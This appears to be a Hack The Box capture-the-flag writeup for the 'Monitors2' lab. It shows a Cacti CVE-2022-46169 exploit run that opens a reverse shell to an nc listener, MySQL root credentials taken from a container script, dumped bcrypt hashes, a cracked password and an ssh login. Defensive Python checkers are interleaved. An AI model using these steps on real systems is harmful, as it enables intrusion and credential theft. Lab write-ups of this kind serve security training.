
[Hack The Box] Monitors2 writeup

Published 2023/12/10

USER PRIVILEGES

nmap

┌──(kali㉿kali)-[/home/kali.org/Machine/monitor2/CVE-2022-46169-CACTI-1.2.22]
└─$ sudo nmap -n -v -T4 --min-rate 10000 10.10.11.189 -sSV -Pn
[sudo] kali のパスワード:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-10 18:46 JST
NSE: Loaded 46 scripts for scanning.
Initiating SYN Stealth Scan at 18:46
Scanning 10.10.11.189 [1000 ports]
Completed SYN Stealth Scan at 18:46, 1.12s elapsed (1000 total ports)
Initiating Service scan at 18:46
NSE: Script scanning 10.10.11.189.
Initiating NSE at 18:46
Completed NSE at 18:46, 0.00s elapsed
Initiating NSE at 18:46
Completed NSE at 18:46, 0.00s elapsed
Nmap scan report for 10.10.11.189
Host is up.
All 1000 scanned ports on 10.10.11.189 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds
           Raw packets sent: 2000 (88.000KB) | Rcvd: 0 (0B)

ffuf

┌──(kali㉿kali)-[/home/kali.org]
└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.11.211/FUZZ -c -v 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.211/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 13844, Words: 600, Lines: 273, Duration: 476ms]
| URL | http://10.10.11.211/#
    * FUZZ: #

Paths such as /CHANGELOG and /plugins looked interesting, but they yielded no useful information.

web enumeration

Cacti Unauthenticated RCE (CVE-2022-46169)

According to this article, Cacti <= 1.2.22 has a vulnerability that chains an authentication bypass with command injection.
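
As an added defender's check (my code, not part of the original writeup and not the exploit script): a small Python helper that tells whether a reported Cacti version falls inside the affected range stated above (<= 1.2.22) and scans web-server access-log lines for requests to remote_agent.php, the endpoint the Cacti advisory names for this CVE, that come from addresses which are not registered pollers. Cacti's own check trusts an application-level client address, while the web server log records the real TCP peer, so the logged source address stays useful for detection. The log format, the sample lines and the poller allow-list are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Apache "combined" log format; group names are mine.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (assumed format; not taken from the box).
SAMPLE_LOG = """\
172.18.0.3 - - [10/Dec/2023:18:49:58 +0900] "GET /remote_agent.php?action=ping HTTP/1.1" 200 20 "-" "Cacti-Poller"
10.10.14.36 - - [10/Dec/2023:18:50:01 +0900] "GET /index.php HTTP/1.1" 200 13844 "-" "Mozilla/5.0"
10.10.14.36 - - [10/Dec/2023:18:50:07 +0900] "GET /remote_agent.php?action=polldata&host_id=1 HTTP/1.1" 200 512 "-" "python-requests/2.31"
"""


def is_affected_version(version: str) -> bool:
    """Cacti releases up to and including 1.2.22 are in the affected range."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version)[:3])
    return parts <= (1, 2, 22)


def remote_agent_hits_from_unknown_sources(log_text: str, allowed_pollers: set) -> list:
    """Return requests to remote_agent.php whose TCP peer is not a known poller address."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path = urlsplit(m.group("target")).path
        if not path.endswith("/remote_agent.php"):
            continue
        if m.group("ip") in allowed_pollers:
            continue  # legitimate poller traffic
        hits.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "target": m.group("target"),
            "status": int(m.group("status")),
        })
    return hits


if __name__ == "__main__":
    print("1.2.22 affected:", is_affected_version("1.2.22"))
    print("1.2.23 affected:", is_affected_version("1.2.23"))
    for hit in remote_agent_hits_from_unknown_sources(SAMPLE_LOG, {"172.18.0.3"}):
        print("suspicious remote_agent.php request:", hit)
```

Any hit from outside the poller allow-list deserves a look; a 200 response from a host that should not talk to remote_agent.php at all is the signal to act on, together with upgrading past 1.2.22.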

CVE-2022-46169.py is used like this:

┌──(kali㉿kali)-[/home/kali.org/Machine/monitor2/CVE-2022-46169-CACTI-1.2.22]
└─$ python3 CVE-2022-46169.py -h                    
Usage: CVE-2022-46169.py [options]

Options:
  -h, --help            show this help message and exit
  -u URL_TARGET, --url=URL_TARGET
                        The url target
  --LHOST=LHOST         Your ip
  --LPORT=LPORT         The listening port
┌──(kali㉿kali)-[/home/kali.org/Machine/monitor2/CVE-2022-46169-CACTI-1.2.22]
└─$ python3 CVE-2022-46169.py -u http://10.10.11.211 --LHOST=10.10.14.36 --LPORT=4444
Checking...
The target is vulnerable. Exploiting...
Bruteforcing the host_id and local_data_ids
Bruteforce Success!!

Listen with nc

┌──(kali㉿kali)-[/home/kali.org]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.36] from (UNKNOWN) [10.10.11.211] 54826
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@50bca5e748b0:/var/www/html$ 

It came back!!
I poked around inside and checked /home and so on, but there was no user.txt...
Then I found a file called entrypoint.sh in the root directory.

www-data@50bca5e748b0:/$ ll
total 84
drwxr-xr-x   1 root root 4096 Mar 21  2023 .
drwxr-xr-x   1 root root 4096 Mar 21  2023 ..
-rwxr-xr-x   1 root root    0 Mar 21  2023 .dockerenv
drwxr-xr-x   1 root root 4096 Mar 22  2023 bin
drwxr-xr-x   2 root root 4096 Mar 22  2023 boot
drwxr-xr-x   5 root root  340 Dec 10 08:08 dev
-rw-r--r--   1 root root  648 Jan  5  2023 entrypoint.sh
drwxr-xr-x   1 root root 4096 Mar 21  2023 etc
drwxr-xr-x   2 root root 4096 Mar 22  2023 home
drwxr-xr-x   1 root root 4096 Nov 15  2022 lib
drwxr-xr-x   2 root root 4096 Mar 22  2023 lib64
drwxr-xr-x   2 root root 4096 Mar 22  2023 media
drwxr-xr-x   2 root root 4096 Mar 22  2023 mnt
drwxr-xr-x   2 root root 4096 Mar 22  2023 opt
dr-xr-xr-x 274 root root    0 Dec 10 08:08 proc
drwx------   1 root root 4096 Mar 21  2023 root
drwxr-xr-x   1 root root 4096 Nov 15  2022 run
drwxr-xr-x   1 root root 4096 Jan  9  2023 sbin
drwxr-xr-x   2 root root 4096 Mar 22  2023 srv
dr-xr-xr-x  13 root root    0 Dec 10 08:08 sys
drwxrwxrwt   1 root root 4096 Dec 10 09:30 tmp
drwxr-xr-x   1 root root 4096 Nov 14  2022 usr
drwxr-xr-x   1 root root 4096 Nov 15  2022 var
entrypoint.sh
#!/bin/bash
set -ex

wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
    mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
    mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
    mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi
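
The script above embeds the MySQL root password in plain text in a file readable by every user in the container (-rw-r--r--), which is what makes the database contents reachable from the www-data shell. As an added example (my code, not from the box or from Cacti): a Python helper that flags such credentials in a shell script and rewrites the mysql invocations to read them from an option file through the client's real --defaults-extra-file option, which mysql requires to be the first option on the command line. The /run/secrets/db.cnf path is an assumed placeholder.

```python
import re

# Constructed copy of the entrypoint.sh body shown above (the scanner is mine).
ENTRYPOINT = """\
#!/bin/bash
set -ex

wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
    mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
    mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
    mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi
"""

# Password passed on the command line or through the MYSQL_PWD environment variable.
SECRET_RE = re.compile(r"(--password)=(\S+)|(MYSQL_PWD)=(\S+)")

# "mysql <other options> --user=X --password=Y": capture the other options so they can be kept.
MYSQL_CRED_RE = re.compile(
    r"mysql(?P<pre>(?:\s+--(?!user=|password=)\S+)*)\s+--user=\S+\s+--password=\S+"
)

# What the referenced option file would contain (placeholder values, mode 0600).
OPTION_FILE_TEMPLATE = "[client]\nuser=cacti_app\npassword=<from-secret-store>\n"


def find_hardcoded_credentials(script: str) -> list:
    """Report every line that carries a MySQL password in clear text."""
    findings = []
    for no, line in enumerate(script.splitlines(), 1):
        for m in SECRET_RE.finditer(line):
            kind = m.group(1) or m.group(3)
            secret = m.group(2) or m.group(4)
            findings.append({
                "line": no,
                "kind": kind,
                "user_is_root": "--user=root" in line,
                "secret_len": len(secret),  # length only; never echo the secret itself
            })
    return findings


def harden(script: str, option_file: str = "/run/secrets/db.cnf") -> str:
    """Replace inline --user/--password with an option file placed first on the command line."""
    return MYSQL_CRED_RE.sub(
        lambda m: f"mysql --defaults-extra-file={option_file}{m.group('pre')}", script
    )


if __name__ == "__main__":
    for f in find_hardcoded_credentials(ENTRYPOINT):
        print(f)
    print(harden(ENTRYPOINT))
```

The rewrite only moves the secret out of the script; the option file still has to be mode 0600, owned by the account that runs the script, and the database account should be one with privileges limited to the cacti schema rather than root.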
Using the credentials from that script, the same command works from the reverse shell:

mysql --host=db --user=root --password=root cacti -e "show tables;"
< --user=root --password=root cacti -e "show tables;"   
+-------------------------------------+
| Tables_in_cacti                     |
+-------------------------------------+
| aggregate_graph_templates           |
| aggregate_graph_templates_graph     |
| aggregate_graph_templates_item      |
| aggregate_graphs                    |
| aggregate_graphs_graph_item         |
| aggregate_graphs_items              |
| automation_devices                  |
| automation_graph_rule_items         |
| automation_graph_rules              |
| automation_ips                      |
| automation_match_rule_items         |
| automation_networks                 |
| automation_processes                |
| automation_snmp                     |
| automation_snmp_items               |
| automation_templates                |
| automation_tree_rule_items          |
| automation_tree_rules               |
| cdef                                |
| cdef_items                          |
| color_template_items                |
| color_templates                     |
| colors                              |
| data_debug                          |
| data_input                          |
| data_input_data                     |
| data_input_fields                   |
| data_local                          |
| data_source_profiles                |
| data_source_profiles_cf             |
| data_source_profiles_rra            |
| data_source_purge_action            |
| data_source_purge_temp              |
| data_source_stats_daily             |
| data_source_stats_hourly            |
| data_source_stats_hourly_cache      |
| data_source_stats_hourly_last       |
| data_source_stats_monthly           |
| data_source_stats_weekly            |
| data_source_stats_yearly            |
| data_template                       |
| data_template_data                  |
| data_template_rrd                   |
| external_links                      |
| graph_local                         |
| graph_template_input                |
| graph_template_input_defs           |
| graph_templates                     |
| graph_templates_gprint              |
| graph_templates_graph               |
| graph_templates_item                |
| graph_tree                          |
| graph_tree_items                    |
| host                                |
| host_graph                          |
| host_snmp_cache                     |
| host_snmp_query                     |
| host_template                       |
| host_template_graph                 |
| host_template_snmp_query            |
| plugin_config                       |
| plugin_db_changes                   |
| plugin_hooks                        |
| plugin_realms                       |
| poller                              |
| poller_command                      |
| poller_data_template_field_mappings |
| poller_item                         |
| poller_output                       |
| poller_output_boost                 |
| poller_output_boost_local_data_ids  |
| poller_output_boost_processes       |
| poller_output_realtime              |
| poller_reindex                      |
| poller_resource_cache               |
| poller_time                         |
| processes                           |
| reports                             |
| reports_items                       |
| sessions                            |
| settings                            |
| settings_tree                       |
| settings_user                       |
| settings_user_group                 |
| sites                               |
| snmp_query                          |
| snmp_query_graph                    |
| snmp_query_graph_rrd                |
| snmp_query_graph_rrd_sv             |
| snmp_query_graph_sv                 |
| snmpagent_cache                     |
| snmpagent_cache_notifications       |
| snmpagent_cache_textual_conventions |
| snmpagent_managers                  |
| snmpagent_managers_notifications    |
| snmpagent_mibs                      |
| snmpagent_notifications_log         |
| user_auth                           |
| user_auth_cache                     |
| user_auth_group                     |
| user_auth_group_members             |
| user_auth_group_perms               |
| user_auth_group_realm               |
| user_auth_perms                     |
| user_auth_realm                     |
| user_domains                        |
| user_domains_ldap                   |
| user_log                            |
| vdef                                |
| vdef_items                          |
| version                             |
+-------------------------------------+
mysql --host=db --user=root --password=root cacti -e "select * from user_auth"
<--user=root --password=root cacti -e "select * from user_auth;"
+----+----------+--------------------------------------------------------------+-------+----------------+------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
| id | username | password                                                     | realm | full_name      | email_address          | must_change_password | password_change | show_tree | show_list | show_preview | graph_settings | login_opts | policy_graphs | policy_trees | policy_hosts | policy_graph_templates | enabled | lastchange | lastlogin | password_history | locked | failed_attempts | lastfail | reset_perms |
+----+----------+--------------------------------------------------------------+-------+----------------+------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
|  1 | admin    | $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC |     0 | Jamie Thompson | admin@monitorstwo.htb  |                      | on              | on        | on        | on           | on             |          2 |             1 |            1 |            1 |                      1 | on      |         -1 |        -1 | -1               |        |               0 |        0 |   663348655 |
|  3 | guest    | 43e9a4ab75570f5b                                             |     0 | Guest Account  |                        | on                   | on              | on        | on        | on           | 3              |          1 |             1 |            1 |            1 |                      1 |         |         -1 |        -1 | -1               |        |               0 |        0 |           0 |
|  4 | marcus   | $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C |     0 | Marcus Brune   | marcus@monitorstwo.htb |                      |                 | on        | on        | on           | on             |          1 |             1 |            1 |            1 |                      1 | on      |         -1 |        -1 |                  | on     |               0 |        0 |  2135691668 |
+----+----------+--------------------------------------------------------------+-------+----------------+------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+

john the ripper

Use john, a tool for cracking hashes.
hashcat can do the same thing.
I also tried cracking the admin and guest passwords, but in the end only marcus's password cracked.

┌──(kali㉿kali)-[/home/kali.org/Machine/monitor2]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt marcus.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
funkymonkey      (?)     
1g 0:00:01:31 DONE (2023-12-10 18:41) 0.01096g/s 93.52p/s 93.52c/s 93.52C/s 474747..coucou
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
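
As an added check (my code, not part of the writeup): parsing the password column of the user_auth dump above. A bcrypt string carries its scheme and cost factor in the prefix, so the 1024 iterations that john reports as "Cost 1" can be read straight off $2y$10$ (2^10) without cracking anything, and any value that is not in that format, such as guest's fixed-length hex string, stands out as a legacy hash. The minimum cost of 12 is an assumed policy threshold, not something the page states.

```python
import re

# Modular-crypt bcrypt layout: $<scheme>$<2-digit cost>$<22-char salt + 31-char digest>.
BCRYPT_RE = re.compile(r"^\$(?P<scheme>2[abxy]?)\$(?P<cost>\d{2})\$(?P<body>[./A-Za-z0-9]{53})$")

# Rows copied from the user_auth dump above (username, password and enabled columns only).
USER_AUTH = [
    {"username": "admin", "password": "$2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC", "enabled": "on"},
    {"username": "guest", "password": "43e9a4ab75570f5b", "enabled": ""},
    {"username": "marcus", "password": "$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C", "enabled": "on"},
]

MIN_COST = 12  # assumed policy threshold for new bcrypt hashes


def audit_hash(stored: str) -> dict:
    """Classify one stored password value and list the issues a reviewer would raise."""
    m = BCRYPT_RE.match(stored)
    if not m:
        legacy = bool(re.fullmatch(r"[0-9a-f]+", stored))
        return {
            "scheme": None,
            "cost": None,
            "iterations": None,
            "issues": ["not a bcrypt hash" + (" (fixed-length hex, legacy format)" if legacy else "")],
        }
    cost = int(m.group("cost"))
    issues = []
    if cost < MIN_COST:
        issues.append(f"cost {cost} below policy minimum {MIN_COST}")
    return {"scheme": m.group("scheme"), "cost": cost, "iterations": 2 ** cost, "issues": issues}


def audit_user_auth(rows: list) -> list:
    """Audit every row; a disabled account with a legacy hash is noted but not treated as live risk."""
    report = []
    for row in rows:
        entry = audit_hash(row["password"])
        entry["username"] = row["username"]
        entry["enabled"] = row["enabled"] == "on"
        if entry["scheme"] is None and not entry["enabled"]:
            entry["issues"].append("account disabled; rehash on next enable")
        report.append(entry)
    return report


if __name__ == "__main__":
    for entry in audit_user_auth(USER_AUTH):
        print(entry["username"], entry["scheme"], entry["cost"], entry["iterations"], entry["issues"])
```

Raising the cost factor does not stop a dictionary attack against a password like the one recovered here; it only slows each guess. The audit is useful for spotting legacy formats and for confirming that cost is raised consistently when the policy changes.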

After that, all that's left is to connect over ssh.

┌──(kali㉿kali)-[/home/kali.org]
└─$ ssh marcus@10.10.11.211
The authenticity of host '10.10.11.211 (10.10.11.211)' can't be established.
ED25519 key fingerprint is SHA256:RoZ8jwEnGGByxNt04+A/cdluslAwhmiWqG3ebyZko+A.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.211' (ED25519) to the list of known hosts.
marcus@10.10.11.211's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 11 Dec 2023 06:04:35 AM UTC

  System load:                      0.08
  Usage of /:                       63.8% of 6.73GB
  Memory usage:                     22%
  Swap usage:                       0%
  Processes:                        240
  Users logged in:                  0
  IPv4 address for br-60ea49c21773: 172.18.0.1
  IPv4 address for br-7c3b7c0d00b3: 172.19.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.10.11.211
  IPv6 address for eth0:            dead:beef::250:56ff:feb9:dd85


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

You have mail.
Last login: Thu Mar 23 10:12:28 2023 from 10.10.14.40
marcus@monitorstwo:~$ ls
user.txt
marcus@monitorstwo:~$ cat user.txt 

Got user.txt!

PRIVILEGE ESCALATION

sudo -l

It seems there is nothing marcus can run with sudo.

marcus@monitorstwo:~$ sudo -l
[sudo] password for marcus: 
Sorry, user marcus may not run sudo on localhost.
